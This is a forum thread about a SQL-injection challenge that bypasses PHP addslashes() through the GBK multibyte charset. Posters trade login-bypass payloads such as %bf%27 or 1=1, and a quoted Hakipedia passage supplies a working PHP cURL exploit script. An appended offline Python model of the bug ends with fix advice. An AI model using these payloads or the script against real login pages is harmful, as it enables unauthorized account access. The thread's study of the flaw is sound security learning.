Hertz Posted October 7, 2009
The source code of a page is given. What would be the ideal query for extracting the data / logging in as Admin?

    <?php
    function asvsmysql_login($username, $password)
    {
        // addslashes() works byte by byte and knows nothing about the connection charset
        $username = addslashes($username);
        $password = md5($password);

        $db = new Database();
        $db->setHost('localhost');
        $db->setDatabase(ADDSLASH_DATABASE);
        $db->setUser(ADDSLASH_USERNAME);
        $db->setPassword(ADDSLASH_PASSWORD);
        if (false === $db->connect()) {
            return htmlDisplayError('Connection failed.');
        }

        // the server will now lex the query as GBK, a multibyte charset
        $db->query("SET NAMES GBK");
        $db->query("SET CHARACTER SET GBK");

        $query = "SELECT username FROM users WHERE username='$username' AND password='$password'";
        if (false === ($result = $db->queryFirst($query))) {
            return htmlDisplayError('Wrong user/password.');
        }
        if ($result['username'] !== 'Admin') {
            return htmlDisplayError('You are logged in, but not as Admin.');
        }
        return htmlDisplayMessage('You are logged in, congratulations!');
    }
    ?>
ZeroCold Posted October 7, 2009
SELECT username FROM admin WHERE username='$username' AND password='$password' --

??? (not sure) )...
Nytro Posted October 7, 2009 (edited)
username='$username' and password='$password' - Shouldn't you have used double quotes? And I don't see how the function could be called from the browser... Let's assume GET is used for username and password:

username=Admin
password=' OR 1=1'

Something like that. Login bypass.

Edit: It's not right, I didn't look at the beginning.
Edited October 7, 2009 by Nytro
loki Posted October 7, 2009
Nice idea. It would be tempting to build a simple site with the code above... but I suppose finding the solution only requires reading the code?... I might jump in later (though I don't know if I have time today) to put the source and a database on a host and offer the site for attempts. I like the idea.

PS I think you meant ' OR 1 OR ' or ' OR 1=1 OR '
Hertz Posted October 7, 2009
I would put it up if I had somewhere to. Anyway. This challenge is purely about addslashes.
michee Posted October 8, 2009
It uses the fact that the charset is GBK and the escaping is done with addslashes. Then I think a blind injection is possible.... at first glance.
ZeroCold Posted October 8, 2009
SELECT username FROM users WHERE username=addslashes($username) AND password=addslashes(' OR 1=1 OR ')

:D:D
Nytro Posted October 8, 2009
But it didn't have to be made by him. It doesn't matter who made it.
michee Posted October 9, 2009
You put in something like this:

%bf%27 or 1=1 /**

On the original site I get "you're logged in but not as Admin!"
ioinel Posted October 9, 2009
nytro, I know. I posted the site just so everyone can test there. Does anyone have a link to a tutorial on that vulnerability?
loki Posted October 9, 2009
I tried quite a few; indeed the idea would be to end up with a query like

FROM users WHERE username='admin' OR 1 OR 'something' AND password=''";

addslashes turns ' into \' and it seems the only viable method is using UTF8 characters (the site is in an Asian language, so it accepts them, as michee said). The problem is that all my attempts failed; the program has to be tested separately, since by eye it behaves the same at the slightest mistake.
ioinel Posted October 9, 2009
I only found this, but I don't have time now, nor a host to put it on to try.

SQL Injection - Hakipedia

In rare cases under certain conditions, filters such as addslashes() and magic_quotes_gpc can be bypassed when the vulnerable SQL server is using certain character sets such as the GBK character set.

In GBK, the hex value of 0xbf27 is not a valid multi-byte character, however, the hex value of 0xbf5c is. If the characters are construed as single-byte characters, 0xbf5c is 0xbf (¿) followed by 0x5c (\); ¿\. And 0xbf27 is 0x27 (') following a 0xbf (¿); ¿'.

This comes in handy when single quotes are escaped with a backslash (\) using addslashes() or when magic_quotes_gpc is turned on. Although it appears at first that the injection point is blocked via one of these methods, we can bypass this by using 0xbf27. By injecting this hex code, addslashes() will modify 0xbf27 to become 0xbf5c27, which is a valid multi-byte character (0xbf5c) followed by a non-escaped inverted comma. In other words, 0xbf5c is recognised as a single character, so the backslash is useless, and the quote is not escaped.

Although the use of addslashes() or magic_quotes_gpc would normally be considered as somewhat secure, the use of GBK would render them near useless. The following PHP cURL script would be able to make use of the injection:

    <?php
    $url     = "http://www.victimsite.com/login.php";
    $ref     = "http://www.victimsite.com/index.php";
    $session = "PHPSESSID=abcdefg01234567890abcdefg";

    $ch = curl_init();
    curl_setopt( $ch, CURLOPT_URL, $url );
    curl_setopt( $ch, CURLOPT_REFERER, $ref );
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, TRUE );
    curl_setopt( $ch, CURLOPT_COOKIE, $session );
    curl_setopt( $ch, CURLOPT_POST, TRUE );
    // 0xbf 0x27 is sent raw; addslashes() on the server turns it into 0xbf 0x5c 0x27
    curl_setopt( $ch, CURLOPT_POSTFIELDS, "username=" . chr(0xbf) . chr(0x27) . "OR 1=1/*&submit=1" );

    $data = curl_exec( $ch );
    print( $data );
    curl_close( $ch );
    ?>

The CURLOPT_POSTFIELDS line sets the characters to be passed as multi-byte characters, and finishes the statement with OR 1=1/*, thus creating an injection that will bypass the addslashes() and/or magic_quotes_gpc checking.
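The byte-level mechanics behind michee's %bf%27 payload and the Hakipedia text, as an added example that is not part of the original thread or of the Hakipedia article. No database is contacted: PHP's addslashes() is emulated byte by byte, the challenge's query is assembled as raw bytes, and the way a charset-aware SQL lexer finds the end of a quoted literal is modelled by a small scanner (an assumption standing in for MySQL itself). PASSWORD_MD5 is a placeholder value and PAYLOAD is the thread's payload written as bytes.

```python
# Added example, not code from the original thread: a byte-level model of the
# addslashes()/GBK bypass discussed above. Nothing connects to a database; the
# charset-aware handling of quotes and backslashes by the MySQL lexer is
# emulated by a small scanner so the effect can be inspected offline.

# Placeholder: md5("") stands in for the hashed password column value.
PASSWORD_MD5 = b"d41d8cd98f00b204e9800998ecf8427e"

# The thread's payload as raw bytes: %bf%27 (0xBF followed by ') and the injection.
PAYLOAD = b"\xbf\x27 OR 1=1/*"


def addslashes(raw: bytes) -> bytes:
    """Byte-wise emulation of PHP addslashes(): a backslash before ' " and \\,
    and NUL rewritten as \\0. It never consults a character set, which is the
    root of the bypass."""
    out = bytearray()
    for b in raw:
        if b == 0x00:
            out += b"\\0"
        elif b in (0x27, 0x22, 0x5C):  # ' " \
            out += b"\\" + bytes([b])
        else:
            out.append(b)
    return bytes(out)


def is_valid_gbk(seq: bytes) -> bool:
    """True if the bytes decode strictly as GBK (0xBF27 does not, 0xBF5C does)."""
    try:
        seq.decode("gbk")
        return True
    except UnicodeDecodeError:
        return False


def build_query(username: bytes) -> bytes:
    """The challenge's query, concatenated exactly as the PHP does, but as bytes."""
    return (b"SELECT username FROM users WHERE username='" + addslashes(username)
            + b"' AND password='" + PASSWORD_MD5 + b"'")


def split_first_literal(query: str) -> tuple[str, str]:
    """Scan the first single-quoted literal on *decoded characters*, the way a
    charset-aware lexer does: a backslash escapes the following character, an
    unescaped quote closes the literal. Returns (literal, text after the quote)."""
    i = query.index("'") + 1
    literal = []
    while i < len(query):
        c = query[i]
        if c == "\\" and i + 1 < len(query):
            literal.append(query[i + 1])
            i += 2
        elif c == "'":
            return "".join(literal), query[i + 1:]
        else:
            literal.append(c)
            i += 1
    raise ValueError("unterminated string literal")


def analyse(username: bytes, connection_charset: str) -> dict:
    """Build the query, decode it as the server would after SET NAMES <charset>,
    and report whether the injected OR 1=1 ended up outside the username literal."""
    decoded = build_query(username).decode(connection_charset)
    literal, rest = split_first_literal(decoded)
    return {"decoded": decoded, "username_literal": literal, "injected": "OR 1=1" in rest}


if __name__ == "__main__":
    # Under GBK the escaped bytes 0xBF 0x5C collapse into one character and the
    # quote is live; under a single-byte charset the backslash still protects it.
    for cs in ("gbk", "latin1"):
        r = analyse(PAYLOAD, cs)
        print(f"{cs:7} literal={r['username_literal']!r} injected={r['injected']}")
```

With the connection charset set to gbk the escaped username decodes to a single CJK character followed by an unescaped quote, so the literal closes early and `OR 1=1/*` becomes part of the WHERE clause; with latin1 the same bytes decode to `¿\'` and the quote stays inside the literal. The fix on the PHP side is escaping that knows the connection charset (mysql_real_escape_string() after mysql_set_charset()) or, better, prepared statements with bound parameters; addslashes() cannot be made safe for a multibyte connection charset.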